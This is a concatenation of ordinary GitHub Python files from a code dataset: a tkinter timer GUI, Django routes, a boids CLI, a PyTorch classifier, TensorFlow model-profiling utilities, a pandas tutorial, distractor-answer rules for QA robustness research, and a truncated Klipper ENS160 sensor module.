mgr):\n tk.Toplevel.__init__(self)\n AbstractGraphicTimerManager.__init__(self, mgr)\n self.labelNoActiveTimers = None\n \n # initialization\n def init(self):\n # main logger\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info('')\n self.setTitle(self.mgr.cfg_file)\n # (re)create Labels \n nbActiveTimers = self.createLabelTimers()\n # check if detached timers\n if nbActiveTimers >=1:\n # DragAndDropL Labels Management after update\n dragAndDropTimerTool = DragAndDropLabelsManager(self)\n dragAndDropTimerTool.init()\n else:\n self.labelNoActiveTimers = tk.Label(self, text = 'No active Timers...').grid(padx=50, pady=50)\n # close the window with X\n self.protocol(\"WM_DELETE_WINDOW\", lambda : self.closing_procedure(self.destroy))\n self.bindGTimers()\n \n # bind all \n def bindGTimers(self):\n self.logger.info('') \n # handle key binding \n self.bind('', lambda event: self.processKeyPressed(event))\n \n # (re)create Labels\n def createLabelTimers(self):\n self.logger.info('')\n # sort by position\n listSortedTimerData = sorted(self.timerConf .TimerDataList, key =lambda TimerData : TimerData.timer_conf[ParamTimerCnf.Position] )\n # create the label for each powerup timer\n index = 0\n for timerData in listSortedTimerData: \n if timerData.label != None:\n timerData.label.destroy()\n timerData.label = None\n if timerData.isActive() == True:\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n \n timerData.label = tk.Label(self, text = timerData.getStrTimerValue() , \n font = fontTimerLabel,\n foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB], \n bg=timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] , padx=int(self.timerConf.general_conf[ParamCnf.TimerFontSize]) / 5)\n # vertical or horizontal Disposition\n if int(self.timerConf .general_conf[ParamCnf.Disposition]) == TimerDisposition.VERTICAL.value:\n timerData.label.grid(row=index, column=0)\n else: \n timerData.label.grid(row=0, column=index) \n # position in the window\n timerData.gposition = index\n index += 1\n return index \n \n # evaluate timers position\n def evaluateTimerPosition(self):\n self.logger.info('')\n # sort by position\n listSortedTimerData = sorted(self.timerConf.TimerDataList, key =lambda TimerData : TimerData.timer_conf[ParamTimerCnf.Position] )\n # create the label for each powerup timer\n index = 0\n for timerData in listSortedTimerData: \n if timerData.isActive() == True:\n if int(self.timerConf.general_conf[ParamCnf.Disposition]) == TimerDisposition.VERTICAL.value:\n timerData.label.grid(row=index, column=0)\n else: \n timerData.label.grid(row=0, column=index) \n index += 1\n \n #modifiy Disposition\n def changeDisposition(self):\n self.logger.info('')\n if int(self.mgr.UTtimerConfig.general_conf[ParamCnf.Disposition]) != TimerDisposition.DETACHED.value:\n self.evaluateTimerPosition() \n else:\n self.mgr.buildGTimers()\n \n #modify Font \n def changeFont(self): \n self.logger.info('')\n for timerData in self.timerConf.TimerDataList: \n if timerData.isActive() == True:\n fontTimerLabel = tk.font.Font(family=self.timerConf.general_conf[ParamCnf.TimerFontName], weight=self.timerConf.general_conf[ParamCnf.TimerFontStyle], size = int(self.timerConf.general_conf[ParamCnf.TimerFontSize]))\n timerData.label.config(font = fontTimerLabel)\n \n #modify color timer text \n def changeFgColorTimer(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList: \n if timerData.isActive() == True and self.timerConf.general_conf[ParamCnf.ColorTimerRGB] != '':\n timerData.label.config( foreground = self.timerConf.general_conf[ParamCnf.ColorTimerRGB])\n \n #modify color timer text \n def changeBgColorTimer(self, name):\n self.logger.info(' name=%s' % name)\n timerData = self.timerConf.getTimerDataFromName(name)\n if timerData.isActive() == True and timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB] != '':\n timerData.label.config(bg=timerData.timer_conf[ParamTimerCnf.ColorBackGroundRGB])\n \n # modify timer value\n def changeValue(self, name):\n self.logger.info(' name=%s' % name)\n timerData = self.timerConf.getTimerDataFromName(name)\n if timerData.isActive() == True:\n timerData.label.config(text = timerData.getStrTimerValue())\n \n # clean\n def clean(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList:\n if timerData.timer != None and timerData.timer.is_alive():\n timerData.timer.cancel()\n if self.labelNoActiveTimers != None:\n self.labelNoActiveTimers.destroy()\n \n # return size of label\n def getLabelSize(self):\n self.logger.info('')\n for timerData in self.timerConf.TimerDataList:\n if timerData.label != None:\n return (timerData.label.winfo_width(), timerData.label.winfo_height()) \n return (490, 192) # default\n \n # return timer from gposition\n def getTimerDataFromGPosition(self, gposition):\n self.logger.info('gposition=%s' % gposition)\n for timerData in self.timerConf.TimerDataList:\n if timerData.isActive() and timerData.gposition == gposition:\n return timerData\n \n #on remove timer\n def removeTimer(self):\n self.logger.info('')\n # replace\n self.evaluateTimerPosition() \n\n # setTitle\n def setTitle(self, title):\n self.logger.info('title=%s' % title)\n self.title(title)\n \n # ask before closing application\n def closing_procedure(self, callback, *args, **kwargs):\n self.logger.info('args=%s kwargs=%s' % (args, kwargs))\n self.clean()\n self.mgr.onClosedGtimers()\n callback(*args, **kwargs)\n \n # call by DragAndDrop when drop\n def onDrop(self):\n if tk.messagebox.askyesno(\"Save configuration\", \"Timers position have changed. Do you want to save changes ? \", parent=self) == True:\n if self.mgr.optionsEditorMgr == None:\n self.timerConf.saveTimersInformation()\n self.timerConf.saveConfiguration()\n else:\n self.mgr.optionsEditorMgr.saveConfigurationChanges(self.mgr.cfg_file)\n","repo_name":"Danube31/UTTimer","sub_path":"source/GraphicAttachedTimersManager.py","file_name":"GraphicAttachedTimersManager.py","file_ext":"py","file_size_in_byte":7865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70655722680","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import UserView, LoginView, LogoutView\n\nrouter = DefaultRouter()\nrouter.register(r\"accounts\", UserView)\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(\"login/\", LoginView.as_view(), name=\"login\"),\n path(\"logout/\", LogoutView.as_view(), name=\"logout\")\n \n]\n","repo_name":"rakib60/wizdoor-app","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22699162422","text":"#!/usr/bin/env python\nfrom argparse import ArgumentParser\nfrom boids_code.mkgraph import make_graph\n\ndef load_boids():\n parser = ArgumentParser(description = 'Visualize boids flying around')\n parser.add_argument('--number', help='Number of boids', dest='number', type=int)\n parser.add_argument('--speed', help='slow or fast', dest='speed', type=str)\n parser.add_argument('--out', help='Type mp4 or gif to save the animation', dest='out', type=str)\n arguments = parser.parse_args()\n\n make_graph(arguments.number, arguments.speed, arguments.out)\n\nif __name__ == \"__main__\":\n load_boids()\n","repo_name":"dgvisnadi/boids","sub_path":"boids_code/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26685371137","text":"def solution(brown, yellow):\n answer = []\n size = brown + yellow\n # 전체 사각형의 x, y 값을 구할거임\n for x in range(1, size+1):\n # 넓이가 나누어 떨어지지 않으면 패스\n if size % x != 0:\n continue\n y = size / x\n print(x, y)\n # 세로가 더 큰 케이스는 제외\n if y > x:\n continue\n if yellow == size -(2*x) -(2*y) + 4:\n answer = [x, y]\n \n return answer","repo_name":"kkkapuq/algo_study","sub_path":"프로그래머스/lv2/42842. 카펫/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18849565383","text":"import torch\n\n\nclass ANNClassifier(torch.nn.Module):\n def __init__(self, input_size, output_size, layer_sizes=(), activation=None, dropout=0.0):\n \"\"\"Network initialization\n\n Args:\n input_size: number of features in an observation\n output_size: number of classes in a prediction\n \"\"\"\n\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.layer_sizes = layer_sizes\n self.activation = activation or torch.nn.Sigmoid()\n\n sizes = [input_size, *layer_sizes, output_size]\n lower, upper = iter(sizes), iter(sizes)\n next(upper)\n\n # torch can't find parameters inside lists\n self.layers = torch.nn.ModuleList(torch.nn.Linear(*window) for window in zip(lower, upper))\n self.dropout = torch.nn.Dropout(dropout)\n\n # activation transforms features to probability vector\n self.activation_final = torch.nn.Sigmoid()\n\n def forward(self, data):\n \"\"\"Given an observation, update lstm state and return the network prediction\n\n Args:\n data: a matrix of dimension [batch_size, input_features]\n batch_size: number of observations\n input_features: number of features for each observation\n Return:\n torch.tensor: the output of the network\n \"\"\"\n\n # make sure data type is correct\n data = data.float()\n\n for layer in self.layers[:-1]:\n data = self.dropout(self.activation(layer(data)))\n\n # print(self.layers[1].weight)\n\n return self.activation_final(self.activation(self.layers[-1](data)))\n","repo_name":"ICEWS-ML/Models","sub_path":"models/torch_ann/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26329177473","text":"import math\nfrom time import time\nfrom typing import Optional, Tuple\n\nimport tensorflow as tf\n\nfrom tfimm.models import registry\nfrom tfimm.models.factory import create_model\nfrom tfimm.utils import to_2tuple\n\n\ndef _below_resolution(\n lower: int,\n upper: int,\n resolution_abs: int,\n resolution_rel: Optional[float],\n):\n \"\"\"We check if (upper - lower) <= resolution.\"\"\"\n if resolution_rel is not None:\n if abs(upper - lower) <= upper * resolution_rel:\n return True\n\n # Absolute resolution is always at least 1\n if abs(upper - lower) <= resolution_abs:\n return True\n\n return False\n\n\ndef _time_function(fun, img, nb_batches, verbose):\n \"\"\"Helper function to time the execution of `fun(img)`.\"\"\"\n # We ignore the first run because graph compilation takes time. And some memory.\n fun(img)\n\n # Now we start counting batches\n start = time()\n for j in range(nb_batches):\n fun(img)\n if verbose:\n print(f\"Batch {j}: {(time() - start) / (j + 1):.3f}sec.\")\n duration = time() - start\n return duration\n\n\ndef time_model(\n model_name,\n target,\n input_size,\n nb_classes,\n batch_size,\n float_policy,\n nb_batches,\n verbose=False,\n):\n \"\"\"\n Time backpropagation speed of model. The loss is simply the mean of all model\n outputs.\n\n Args:\n model_name: Model to be timed, will be created using `create_model`.\n target: One of \"inference\" or \"backprop\"\n input_size: Model input size\n nb_classes: Number of classes\n batch_size: Batch size to be used for testing.\n float_policy: Can be \"float32\" or \"mixed_float16\"\n nb_batches: Backpropagation time is averages over `nb_batches` calls.\n verbose: If `True`, we print duration of each batch\n\n Returns:\n Backpropagation throughput in img/sec.\n \"\"\"\n assert float_policy in {\"float32\", \"mixed_float16\"}\n\n tf.keras.backend.clear_session() # Release GPU memory\n # Need to set policy before creating model\n tf.keras.mixed_precision.set_global_policy(float_policy)\n dtype = \"float32\" if float_policy == \"float32\" else \"float16\"\n\n input_size = to_2tuple(input_size) if input_size is not None else input_size\n model = create_model(model_name, input_size=input_size, nb_classes=nb_classes)\n img = tf.ones(\n (batch_size, *model.cfg.input_size, model.cfg.in_channels),\n dtype=dtype,\n )\n\n if target == \"inference\":\n\n @tf.function(experimental_relax_shapes=True, jit_compile=True)\n def _fun(x):\n return model(x, training=False)\n\n elif target == \"backprop\":\n optimizer = tf.optimizers.SGD(learning_rate=0.0001)\n\n @tf.function(experimental_relax_shapes=True)\n def _fun(x):\n with tf.GradientTape() as tape:\n output = model(x, training=True)\n # The loss is always computed in float32 in order to not lose precision\n # Here we simulate it to make profiling more accurate\n output = tf.cast(output, \"float32\")\n loss = tf.reduce_mean(output)\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n else:\n raise ValueError(f\"Unknown target: {target}.\")\n\n duration = _time_function(_fun, img, nb_batches, verbose)\n img_per_sec = batch_size * nb_batches / duration\n return img_per_sec\n\n\ndef find_max_batch_size(\n model_name: str,\n target: str = \"inference\",\n input_size: Optional[int] = None,\n nb_classes: Optional[int] = None,\n float_policy: str = \"float32\",\n nb_batches: int = 3,\n start_batch_size: int = 256,\n resolution_abs: int = 1,\n resolution_rel: Optional[float] = 0.1,\n verbose: bool = False,\n) -> Tuple[int, float]:\n \"\"\"\n Searches for largest batch size that fits in memory.\n\n Args:\n model_name: Model to validate\n target: Can be \"inference\" or \"backprop\"\n float_policy: Can be \"float32\" or \"mixed_float16\"\n nb_batches: For how many batches to run the test\n start_batch_size: First batch size to try\n resolution_abs: We stop, if upper-lower <= resolution_abs\n resolution_rel: We stop, if (upper-lower) <= upper * resolution_rel\n verbose: If True, we print information about search progress\n Returns:\n Maximum batch size that does not lead to OOM errors.\n Inference time in img/sec with that batch size\n \"\"\"\n upper_limit = None\n lower_limit = 0\n\n # Find hard batch size cap depending on model input size. The whole batch should\n # be <0.5 GB of memory.\n cfg = registry.model_config(model_name)\n img_size = 4 * cfg.input_size[0] * cfg.input_size[1] * cfg.in_channels\n max_memory = 5 * 10**8\n # We want max batch size to be a power of 2\n max_batch_size = 2 ** math.floor(math.log2(max_memory / img_size))\n\n continue_search = True\n next_batch_size = min(start_batch_size, max_batch_size)\n img_per_sec = 0.0\n while continue_search:\n batch_size = next_batch_size\n if verbose:\n print(f\"Trying: {batch_size}. Range: ({lower_limit}, {upper_limit})\")\n try:\n img_per_sec = time_model(\n model_name=model_name,\n target=target,\n input_size=input_size,\n nb_classes=nb_classes,\n batch_size=batch_size,\n float_policy=float_policy,\n nb_batches=nb_batches,\n )\n success = True\n lower_limit = batch_size\n\n if batch_size >= max_batch_size:\n continue_search = False\n elif upper_limit is None:\n next_batch_size = 2 * batch_size\n next_batch_size = min(next_batch_size, max_batch_size)\n elif _below_resolution(\n lower_limit, upper_limit, resolution_abs, resolution_rel\n ):\n continue_search = False\n else:\n next_batch_size = (upper_limit + batch_size) // 2\n\n except (\n tf.errors.InternalError,\n # The next one catches creating models with invalid parameters\n tf.errors.InvalidArgumentError,\n tf.errors.ResourceExhaustedError,\n tf.errors.UnknownError,\n ):\n success = False\n upper_limit = batch_size\n if _below_resolution(\n lower_limit, upper_limit, resolution_abs, resolution_rel\n ):\n continue_search = False\n else:\n next_batch_size = (batch_size + lower_limit) // 2\n\n finally:\n if verbose:\n print(f\"Batch size {batch_size}: {'valid' if success else 'oom'}\")\n\n return lower_limit, img_per_sec\n","repo_name":"martinsbruveris/tensorflow-image-models","sub_path":"tfimm/utils/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"40"} +{"seq_id":"31487688259","text":"import numpy as np \nimport pandas as pd\n\nseries = pd.Series(data=[78,92,35,64,89])\nprint(series)\nprint(series.values,series.index)\nprint(series[1])\nprint(series[1:3])\ndata = pd.Series(data=[700000,800000,1600000,1800000,200000],index = ['Swift','Jazz','Civic','Altis','Gallardo'])\nprint(data)\nprint(data['Swift'])\nprint(data['Jazz': 'Gallardo'])\n\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\nprint(car_price)\n\n#Creating a car price series with a dictionary\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\n# Creating the car manufacturer series with a dictionary\ncar_man_dict = {'Swift' : 'Maruti',\n 'Jazz' : 'Honda',\n 'Civic' : 'Honda',\n 'Altis' : 'Toyota',\n 'Gallardo' : 'Lamborghini'}\ncar_man = pd.Series(car_man_dict)\nprint(car_price)\nprint(car_man)\n\ncars = pd.DataFrame({'price':car_price,'Manufacturer':car_man})\nprint(cars)\nprint(cars['price'])\nprint(cars['Manufacturer'])\n\n'''\nA DataFrame is a collection of Series objects, and a single-column DataFrame can be constructed from a single Series:\n'''\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\n#Creating a DataFrame from car_price Series\ncar_dataset = pd.DataFrame(car_price, columns=['Car Price'])\nprint(car_dataset)\n\n'''\nFrom lists of dictionaries\n'''\ndata = [{'Name': 'Subodh', 'Marks': 28},\n {'Name': 'Ram', 'Marks': 27}, \n {'Name': 'Abdul', 'Marks': 26}, \n {'Name': 'John', 'Marks': 28}]\ndata = pd.DataFrame(data)\nprint(data)\n\ndata = pd.DataFrame([{'Subodh':20, 'Ram':25},\n {'Abdul':29, 'John':24}], \n index = ['Mathematics', 'Physics'])\n\n#Using dictionary to create a series\ncar_price_dict = {'Swift': 700000,\n 'Jazz' : 800000,\n 'Civic' : 1600000,\n 'Altis' : 1800000,\n 'Gallardo': 30000000\n }\ncar_price = pd.Series(car_price_dict)\ncar_man_dict = {'Swift' : 'Maruti',\n 'Jazz' : 'Honda',\n 'Civic' : 'Honda',\n 'Altis' : 'Toyota',\n 'Gallardo' : 'Lamborghini'}\ncar_man = pd.Series(car_man_dict)\ncars = pd.DataFrame({'Price': car_price , 'Manufacturer' : car_man})\nprint(cars)\n\n'''\nThe axis keyword\nOne of the important parameters used while performing operations on DataFrames is 'axis'. Axis takes two values: 0 and 1.\n\naxis = 0 represents row specific operations.\n\naxis = 1 represents column specific operations.\n'''","repo_name":"itechdp/Infosys-SpringBoard-Learning","sub_path":"Python For Data Science/Pandas/intro_to_pandas.py","file_name":"intro_to_pandas.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15870425261","text":"import math\nimport random\nimport string \nimport json\nimport numpy as np\nfrom pattern.en import conjugate\nfrom resources.nectar import corenlp\nfrom nltk.corpus import wordnet\nfrom nltk.corpus import stopwords\n\nCOMMON_WORDS = list(stopwords.words('english'))\nPUNCTUATIONS = list(string.punctuation)\n\nFIRST_NAMES = ['Jason', 'Mary', 'James', 'Jeff', 'Abi', 'Bran', 'Sansa', 'Jon', 'Ned', 'Peter', 'Jaime', \\\n'Marcus', 'Chris', 'Diana', 'Phoebe', 'Leo', 'Phil', 'Nick', 'Steve']\nLAST_NAMES = ['Kid', 'Jordan', 'Harden', 'Dean', 'Stark', 'Parker', 'Morris', 'Wallace', 'Manning', 'Rogers', 'Folt', 'White']\nLOCATIONS = ['Chicago', 'Beijing', 'Tokyo', 'Pittsburg', 'Paris', 'Barcelona', 'Madrid', 'Berlin', 'Europe', 'California']\nORGANIZATIONS_START = LAST_NAMES + LOCATIONS\nORGANIZATIONS_END = ['Corporations', 'Industries', 'University', 'Association', 'Department']\nNNP_START = ['Central', 'Eastern', 'Western', 'Golden', 'Stony', 'Student', 'Brooks']\nNNP_END = ['Park', 'House', 'Center', 'Palace', 'Place', 'Store']\nNNPS_START = NNP_START\nNNPS_END = ['Parks', 'Gardens', 'Bullets', 'Lakers', 'Brothers']\nNNPS = ['Cool Kids', 'Kew Gardens', 'Silver Bullets', 'LA Lakers', 'Brooks Brothers']\nNN = ['hamster', 'composer', 'man', 'statement']\nNNS = ['hamsters', 'composers', 'men', 'statements']\n\n\ndef lookup_title_generate(checker, rule):\n '''\n uses cached list of old answers to generate a real answer, return None if it\n does not pass the checker function\n '''\n\n def func(a, tokens, question, title_cache, **kwargs):\n fake = checker(a, tokens, question, **kwargs)\n if fake is None:\n return None\n\n tok_len = len(tokens)\n counter = 0\n new_ans = a\n while new_ans == a:\n if tok_len <= 0:\n return None\n\n counter2 = 0\n while True:\n if str(tok_len) in title_cache[rule]:\n new_ans, new_ans_tok = random.choice(title_cache[rule][str(tok_len)])\n if a.lower().startswith('the ') and (new_ans.lower().startswith('the ') is False) \\\n or a.lower().startswith('the ') is False and new_ans.lower().startswith('the '):\n counter2 += 1\n if counter2 == 40:\n break\n else:\n break\n else:\n tok_len -= 1\n if tok_len <= 0:\n return None\n\n counter += 1\n if counter == 40:\n tok_len -= 1\n counter = 0\n\n if a.lower().startswith('the ') and (new_ans.lower().startswith('the ') is False):\n new_ans = 'The ' + new_ans\n new_ans_tok = [{'originalText': 'The', 'pos': 'DT', 'word': 'the'}] + new_ans_tok\n assert counter2 == 40\n\n return new_ans, new_ans_tok\n return func\n\n\nMONTHS = ['january', 'february', 'march', 'april', 'may', 'june', 'july',\n 'august', 'september', 'october', 'november', 'december']\n\n\ndef bridge_date(a, tokens, q, **kwargs):\n out_toks = []\n if not all(t['ner'] == 'DATE' for t in tokens): return None\n for t in tokens:\n if t['pos'] == 'CD' or t['word'].isdigit():\n try:\n value = int(t['word'])\n except:\n value = 10 # fallback\n if value > 50: \n rand = np.random.randint(0, 10)\n if rand%2 == 0:\n new_val = str(value - np.random.randint(10, 25)) # Year\n else:\n new_val = str(value + np.random.randint(10, 25)) # Year\n else: # Day of month\n if value > 15: new_val = str(value - np.random.randint(1, 12))\n else: new_val = str(value + np.random.randint(1, 12))\n else:\n if t['word'].lower() in MONTHS:\n m_ind = MONTHS.index(t['word'].lower())\n new_val = MONTHS[(m_ind + np.random.randint(1, 11)) % 12].title()\n else:\n # Give up\n new_val = t['originalText']\n out_toks.append({'before': t['before'], 'originalText': new_val})\n new_ans = corenlp.rejoin(out_toks).strip()\n if new_ans == a: return None\n return new_ans, out_toks\n\n\ndef bridge_number(a, tokens, q, **kwargs):\n \"\"\"\n Difference with ans_number: \n 1. Not changing 'thousand', 'million', etc.\n 2. Change trailing digit\n \"\"\"\n out_toks = []\n seen_num = False\n for t in tokens:\n ner = t['ner']\n pos = t['pos']\n w = t['word']\n out_tok = {'before': t['before']}\n\n # Split on dashes\n leftover = ''\n dash_toks = w.split('-')\n if len(dash_toks) > 1:\n w = dash_toks[0]\n leftover = '-'.join(dash_toks[1:])\n\n # Try to get a number out\n value = None\n if w != '%': \n # Percent sign should just pass through\n try:\n value = float(w.replace(',', ''))\n except:\n try:\n norm_ner = t['normalizedNER']\n if norm_ner[0] in ('%', '>', '<'):\n norm_ner = norm_ner[1:]\n value = float(norm_ner)\n except:\n pass\n if not value and (\n ner == 'NUMBER' or \n (ner == 'PERCENT' and pos == 'CD')):\n # Force this to be a number anyways\n value = 10\n if value:\n if math.isinf(value) or math.isnan(value): value = 9001\n seen_num = True\n if w in ('thousand', 'million', 'billion', 'trillion'):\n new_val = w\n else:\n if value < 2500: # This could be years, so don't change too much\n rand = np.random.randint(0, 10)\n if rand%2 == 0:\n new_val = str(value - np.random.randint(1, 11))\n else:\n new_val = str(value + np.random.randint(1, 11))\n else:\n # Change leading digit\n if value == int(value):\n val_chars = list('%d' % value)\n else:\n val_chars = list('%g' % value)\n c = val_chars[-1]\n for i in range(len(val_chars)):\n c = val_chars[len(val_chars)-1-i]\n if c >= '0' and c <= '9':\n val_chars[len(val_chars)-1-i] = str(max((int(c) + np.random.randint(1, 10)) % 10, 1))\n break\n new_val = ''.join(val_chars)\n if leftover:\n new_val = '%s-%s' % (new_val, leftover)\n out_tok['originalText'] = new_val\n else:\n out_tok['originalText'] = t['originalText']\n\n if t['originalText'].endswith('.0') is False and out_tok['originalText'].endswith('.0'):\n out_tok['originalText'] = out_tok['originalText'][:-2]\n out_toks.append(out_tok)\n if seen_num:\n return corenlp.rejoin(out_toks).strip(), out_toks\n else:\n return None\n\n\ndef process_token(word, original_tok):\n new_word = word\n if original_tok['pos'].startswith('V'):\n if original_tok['pos'] == 'VB':\n new_word = conjugate(word, 'VB')\n elif original_tok['pos'] == 'VBD':\n new_word = conjugate(word, 'VBD')\n elif original_tok['pos'] == 'VBN':\n new_word = conjugate(word, 'VBN')\n elif original_tok['pos'] == 'VBG':\n new_word = conjugate(word, 'VBG')\n elif original_tok['pos'] == 'VBZ':\n new_word = conjugate(word, 'VBZ')\n elif original_tok['pos'] == 'VBP':\n new_word = conjugate(word, 'VBP')\n return new_word\n\n\ndef bridge_wordnet_catch_amap(a, tokens, q, **kwargs):\n \"\"\"Returns a function that yields new_ans if the wordnet can find its antonyms\"\"\"\n new_anss = []\n for t in tokens:\n if t['originalText'].lower() in COMMON_WORDS + PUNCTUATIONS:\n new_anss.append(t['originalText'])\n continue \n antonyms = [], [] \n for syn in wordnet.synsets(t['originalText']): \n for l in syn.lemmas(): \n if l.antonyms(): \n antonyms.append(l.antonyms()[0].name())\n \n new_word = None\n if t['pos'].startswith('VB') or t['pos'].startswith('JJ') or t['pos'].startswith('R'):\n for w in antonyms:\n if w.lower() != t['originalText'].lower() and t['originalText'] not in w.lower() and '_' not in w:\n new_word = process_token(w, t)\n break\n if new_word:\n new_anss.append(new_word)\n else:\n return None\n \n if len(new_anss) == 0:\n return None\n for new_ans in new_anss:\n if new_ans.lower() != a.lower():\n return new_ans\n return None\n\n\ndef bridge_entity_full(ner_tag, new_ans):\n \"\"\"Returns a function that yields new_ans iff every token has |ner_tag|.\"\"\"\n def func(a, tokens, q, is_end=False, **kwargs):\n for t in tokens:\n if t['ner'] != ner_tag: return None\n if ner_tag == 'PERSON':\n if is_end:\n return LAST_NAMES[random.randint(0, len(LAST_NAMES)-1)]\n else:\n return FIRST_NAMES[random.randint(0, len(FIRST_NAMES)-1)]\n elif ner_tag == 'LOCATION':\n return LOCATIONS[random.randint(0, len(LOCATIONS)-1)]\n elif ner_tag == 'ORGANIZATION':\n if is_end:\n return ORGANIZATIONS_END[random.randint(0, len(ORGANIZATIONS_END)-1)]\n else:\n return ORGANIZATIONS_START[random.randint(0, len(ORGANIZATIONS_START)-1)]\n return new_ans\n return func\n\n\ndef bridge_abbrev(new_ans):\n def func(a, tokens, q, **kwargs):\n s = a\n if s == s.upper() and s != s.lower():\n return new_ans\n return None\n return func\n\n\ndef bridge_pos(pos, new_ans, end=False, add_dt=False):\n \"\"\"Returns a function that yields new_ans if the first/last token has |pos|.\"\"\"\n def func(a, tokens, q, is_end=True, **kwargs):\n if end:\n for it in range(len(tokens)):\n t = tokens[-1-it]\n if t['originalText'] not in PUNCTUATIONS:\n break\n else:\n t = tokens[0]\n if t['pos'] != pos: return None\n if pos == 'NN':\n return NN[random.randint(0, len(NN)-1)]\n if pos == 'NNS':\n return NNS[random.randint(0, len(NNS)-1)]\n if pos == 'NNP':\n if is_end:\n return NNP_END[random.randint(0, len(NNP_END)-1)]\n else:\n return NNP_START[random.randint(0, len(NNP_START)-1)]\n if pos == 'NNPS':\n if is_end:\n return NNPS_END[random.randint(0, len(NNPS_END)-1)]\n else:\n return NNPS_START[random.randint(0, len(NNPS_START)-1)]\n return new_ans\n return func\n\n \ndef bridge_catch_all(new_ans):\n def func(a, tokens, q, **kwargs):\n if tokens[0]['originalText'][0].isupper():\n return new_ans[0].upper()+new_ans[1:]\n return new_ans\n return func","repo_name":"jiangycTarheel-zz/Adversarial-MultiHopQA","sub_path":"bridge_entity_rules.py","file_name":"bridge_entity_rules.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"40667609225","text":"import logging\nimport csv\nimport time\nimport struct\nimport threading\nimport queue\nimport datetime\n\nfrom . import bus\n\n\nclass ENS160:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(\n config, default_addr=ENS160_I2CADDR_DEFAULT, default_speed=400000)\n self.report_time = config.getfloat(\n \"report_time\", default=1., minval=1.)\n self.sample_timer = self.reactor.register_timer(self.sample_ens160)\n self.syslog_time = config.getfloat(\n \"syslog_time\", default=self.reactor.NEVER)\n self.syslog_last_updated = self.reactor.NOW\n self.csv_basename = config.get(\"csv_basename\", default=None)\n self.csv_log_queue = queue.Queue()\n self.eCO2 = self.TVOC = None\n self.ens160 = None\n self.temperature_sensor = None\n self.temperature_sensor_name = config.get(\n \"temperature_sensor\", default=None)\n self.temperature_key = config.get(\n \"temperature_key\", default=\"temperature\")\n self.temperature_initial = config.getfloat(\n \"temperature_initial\", default=None) # units deg C\n self.temperature_last = None\n self.humidity_sensor = None\n self.humidity_sensor_name = config.get(\n \"humidity_sensor\", default=self.temperature_sensor_name)\n self.humidity_key = config.get(\"humidity_key\", default=\"humidity\")\n self.humidity_initial = config.getfloat(\n \"humidity_initial\", default=None) # units RH %\n self.humidity_last = None\n self.printer.add_object(\"ens160 \" + self.name, self)\n self.printer.register_event_handler(\n \"klippy:connect\", self.handle_connect)\n\n if not self.temperature_sensor_name and not self.temperature_initial:\n raise config.error(\n \"ens160 {}: must specify either 'temperature_sensor'\"\n \" or 'temperature_initial'\".format(self.name))\n\n if not self.humidity_sensor_name and not self.humidity_initial:\n raise config.error(\n \"ens160 {}: must specify either 'humidity_sensor'\"\n \" or 'humidity_initial'\".format(self.name))\n\n gcode = self.printer.lookup_object('gcode')\n gcode.register_mux_command(\"AIR_QUALITY_CSV_LOGGING_START\",\n \"NAME\",\n self.name,\n self.cmd_CSV_LOGGING_START,\n desc=\"Start air quality csv logging\")\n gcode.register_mux_command(\"AIR_QUALITY_CSV_LOGGING_STOP\",\n \"NAME\",\n self.name,\n self.cmd_CSV_LOGGING_STOP,\n desc=\"Stop air quality csv logging\")\n\n def cmd_CSV_LOGGING_START(self, gcmd):\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"start\",\n \"gcmd\": gcmd\n })\n else:\n gcmd.respond_info(\"ens160 {}: csv_basename not specified\"\n .format(self.name))\n\n def cmd_CSV_LOGGING_STOP(self, gcmd):\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"stop\",\n \"gcmd\": 